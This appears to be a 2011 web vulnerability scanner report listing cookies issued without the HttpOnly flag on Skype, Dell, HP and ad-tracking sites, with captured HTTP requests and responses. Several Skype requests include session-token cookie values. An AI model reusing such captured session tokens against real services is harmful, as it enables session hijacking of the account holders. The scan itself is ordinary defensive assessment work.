The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824 Host: support.skype.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shared_components/javascript/launchDemoStage3PlayerClient_js.asp HTTP/1.1 Host: www.demosondemand.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function launchDemoStage3Player(session_id, promotion_id,startTime,reseller_id ) { var initialW = 250; var initialH = 200; var x = (screen.width/2)-initialW/2; var y ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/houlihan-lokey-exit-opps HTTP/1.1 Host: www.wallstreetoasis.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1 Host: 142.xg4ken.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 16:18:39 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:39 GMT; path=/; domain=.xg4ken.com Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/DellPartsFamily.aspx HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 76867 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/ Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:05 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell C ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/ShopAllBrands.aspx HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 165178 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:26 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:25 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop B ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/batteryconfig.aspx?c=us&cs=04&l=en&s=bsd HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 23838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Batter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/category.aspx?category_id= HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:14 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Electr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/category.aspx?c=us&l=en&s=dhs&category_id=5914&cs=19 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 122314 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|dhs|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:18 GMT; path=/ Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=A4186752,A4186751,A4186750; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:19 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:19 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>TVs - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 88780 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/ Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:30 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/memconfig.aspx HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 30746 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:58 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4&~ck=mn HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 34551 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:22 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Printe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sna/productdetail.aspx HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 149 Content-Type: text/html; charset=utf-8 Location: /sna/productnotfound.aspx? Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:44 GMT; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:44 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fsna%2fproductnotfound.aspx%3f">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_inkjets&~ck=mn&~ck=mn HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 53137 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:25 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:25 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop a ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /um/StartNewLogin HTTP/1.1 Host: adwords.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/English/ct-p/English?profile.language=en HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0 Host: community.skype.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
HUBSPOT159=152114348.0.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /salog.js.aspx HTTP/1.1 Host: cymphonix.app3.hubspot.com Proxy-Connection: keep-alive Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var hsUse20Servers = true; var hsDayEndsIn = 42078; var hsWeekEndsIn = 42078; var hsMonthEndsIn = 2288478; var hsAnalyticsServer = "tracking.hubspot.com"; var hsTimeStamp = "2011-09-04 12:18: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
90379962_reset=1315153064;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imp?tid=17&ci=90379962&vn1=4.1.1&vn2=imp&ec=UTF-8&cm_mmc=Wall%20Street%20Journal%20US%20%28WSJ%29-_-2011%20Frost%20Online-_-Business%20Package-_-fro11157_phase2_savings_300x600_v1 HTTP/1.1 Host: data.cmcore.com Proxy-Connection: keep-alive Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/newscolumns_businessstory;u=**300x250,336x280,300x600,336x850******223,234,220,231,233,227**;page=article;msrc=googlenews_wsj;p39=223;p39=234;p39=220;p39=231;p39=233;p39=227;;mc=google_fullfree;tile=5;sz=300x250,336x280,300x600,336x850;ord=9507950795079507; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 16:17:44 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Set-Cookie: 90379962_reset=1315153064;path=/ Expires: Sat, 03 Sep 2011 22:17:44 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private Pragma: no-cache Content-Type: image/gif Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eas?camp=65585;cu=21949;cre=mu;js=y;target=_blank;ord=[timestamp];EASClick= HTTP/1.1 Host: eas.apm.emediate.eu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://lwn.net/Articles/456878/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bb/mrcsrc/getpixel.php?db=1241&ai=1234&si=4321&z=1315187696 HTTP/1.1 Host: gacela.eu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://lwn.net/Articles/456878/
The following cookie was issued by the application and does not have the HttpOnly flag set:
lang=en-us; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subchoice/country/us/en/subhub.aspx HTTP/1.1 Host: h30046.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: h30434.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3 Host: login.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.headsets HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.phones HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.webcams HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.extras HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/skype.manager.setup HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/tvwebcams HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Connection: close Date: Mon, 05 Sep 2011 02:23:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzgyODQzNDI0LjMwMTczMDU2AAAAAAAAAAAJAAAACgAAALWLYU61i2FOdQAAAHaPYU54iWFO8gEAAJeLYU6LiWFOFQAAAM7CYE6OwmBOKwIAAKYvYU6YL2FOGwEAAKGUYU5wi2FODQAAAI8yZE6PMmRO/QEAAJqSYU6ZkmFOmwEAACSUYU7uk2FOBQAAABMAAACakmFOi4lhTkQAAAB2j2FOeIlhTiAAAADOwmBOjsJgThUAAACPMmROjzJkTpgAAAAklGFO7pNhTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 02:23:11 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Pragma: no-cache Expires: -1 Cache-Control: no-cache Content-type: image/gif Content-Length: 67
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
lc=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
